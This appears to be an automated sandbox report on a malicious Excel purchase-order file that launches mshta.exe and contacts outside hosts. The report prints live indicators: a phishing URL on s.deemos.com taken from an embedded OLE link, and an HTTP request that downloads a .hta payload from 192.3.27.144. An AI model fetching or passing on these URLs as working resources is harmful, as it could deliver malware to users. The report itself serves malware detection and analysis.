Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#3311-20250108003.xls

Overview

General Information

Sample name:PO#3311-20250108003.xls
Analysis ID:1585804
MD5:6a899fecf09eb7899fd6a521aba5eb5e
SHA1:2f514a32ca1990347a42c4f3934afcab5a341530
SHA256:519cda9511738dfa6ad57a5716bd217d9c44af7023907711ddc76c4511f24d60
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7236 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7988 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 8048 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2164 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#3311-20250108003.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7236, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7988, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7236, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49969
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49969, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7236, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO#3311-20250108003.xlsVirustotal: Detection: 29%Perma Link
Source: PO#3311-20250108003.xlsReversingLabs: Detection: 24%
Source: PO#3311-20250108003.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.5:49969 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49969 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49969
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.5:49980
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.5:49980 -> 192.3.27.144:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 88MB
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /250/gse/begoodforeverythinggreatthingsformebetterforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: global trafficHTTP traffic detected: GET /fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /250/gse/begoodforeverythinggreatthingsformebetterforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: PO#3311-20250108003.xlsString found in binary or memory: https://s.deemos.com/fmGZaVnS?&bush=watc
Source: B4440000.0.drString found in binary or memory: https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.5:49969 version: TLS 1.2

System Summary

barindex
Source: PO#3311-20250108003.xlsOLE: Microsoft Excel 2007+
Source: B4440000.0.drOLE: Microsoft Excel 2007+
Source: PO#3311-20250108003.xlsOLE indicator, VBA macros: true
Source: PO#3311-20250108003.xlsStream path 'MBD01010D3E/\x1Ole' : https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackworkApM{Tf]Qr*d$kI#+U|ZEEEf,U(I=XGXKXW N{cxzp^C7e|K''oIN4pog&Pqg18NBS~ylQB1d5JaPm4Bn5Cfjbk2ZFCYBomXxTyTDdxzqyhpiszBSa6d09v5fQPo2DGvldDoovZL6yBWAfzkh3otuClceAb0Dd86fg4Bn0Qhp4oFaFmxOlMeV4bWqE3MsPbznD5th5aCFx6aMwiXAh3BwhE9VHCpYvJtFlB2ZbuTdCQE7PwTUjFn12OUljTeB0Zl2>9s3m.2=whO(
Source: B4440000.0.drStream path 'MBD01010D3E/\x1Ole' : https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackworkApM{Tf]Qr*d$kI#+U|ZEEEf,U(I=XGXKXW N{cxzp^C7e|K''oIN4pog&Pqg18NBS~ylQB1d5JaPm4Bn5Cfjbk2ZFCYBomXxTyTDdxzqyhpiszBSa6d09v5fQPo2DGvldDoovZL6yBWAfzkh3otuClceAb0Dd86fg4Bn0Qhp4oFaFmxOlMeV4bWqE3MsPbznD5th5aCFx6aMwiXAh3BwhE9VHCpYvJtFlB2ZbuTdCQE7PwTUjFn12OUljTeB0Zl2>9s3m.2=whO(
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal64.expl.winXLS@6/8@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\B4440000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{566E8481-5814-4264-BC70-809375539609} - OProcSessId.datJump to behavior
Source: PO#3311-20250108003.xlsOLE indicator, Workbook stream: true
Source: B4440000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO#3311-20250108003.xlsVirustotal: Detection: 29%
Source: PO#3311-20250108003.xlsReversingLabs: Detection: 24%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#3311-20250108003.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
